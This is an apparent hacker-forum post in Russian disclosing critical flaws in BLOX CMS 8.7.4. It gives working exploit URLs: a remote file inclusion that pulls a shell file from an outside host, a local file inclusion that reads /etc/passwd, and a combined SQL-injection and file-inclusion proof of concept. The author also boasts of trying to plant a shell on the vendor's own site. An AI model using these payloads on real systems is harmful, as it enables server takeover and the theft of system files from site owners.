Prev Предыдущее сообщение   Следующее сообщение Next
Старый 01.02.2011, 14:56   #1
[Dark Green]
 
Регистрация: 06.07.2010
Сообщений: 15
Репутация: 38
По умолчанию BLOX CMS

Офф. сайт: Blox.ru | Информация о CMS
Текущая версия: 8.7.4 настолько дырявая, что на раскрутку всех багов уйдет вечность Поэтому я ограничелся несколькими критическими уязвимостями =)
Скачать исходник: http://blox.ru/?download&file=BLOX.8.7.4.zip
[PHP-Include REMOTE]
BLOX\functions\go.php[8]
register_globals=ON
Код:
http://blox/BLOX/go.php?dbhost=localhost&dbuser=root&dbpass=&dbname=blox&prefix=1&bloxDir=http://site.ru/shell.txt?
[PHP-Include LOCAL]
BLOX\functions\go.php[18], BLOX\functions\getPageParams.php[3]
register_globals=ON
Код:
http://blox/?cmsLanguage=russian/../../../../etc/passwd%00
POC [PHP-Include with SQL Injection]
BLOX\functions\go.php[29, 119-142]
Ошибка в синтаксисе SQL запроса в скрипте, пока косяк в коде не поправят - работать не будет.
Код:
http://blox/?PQ=1&1'UNION(SELECT(1),2,CONCAT('../../../../../../../../../../ect/passwd',0x00))/*
От заливки шелла на офф сайт проекта админов спас надежный антихек хостинг - sweb.ru... мать его... (=
[Dark Green] вне форума   Ответить с цитированием
 

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot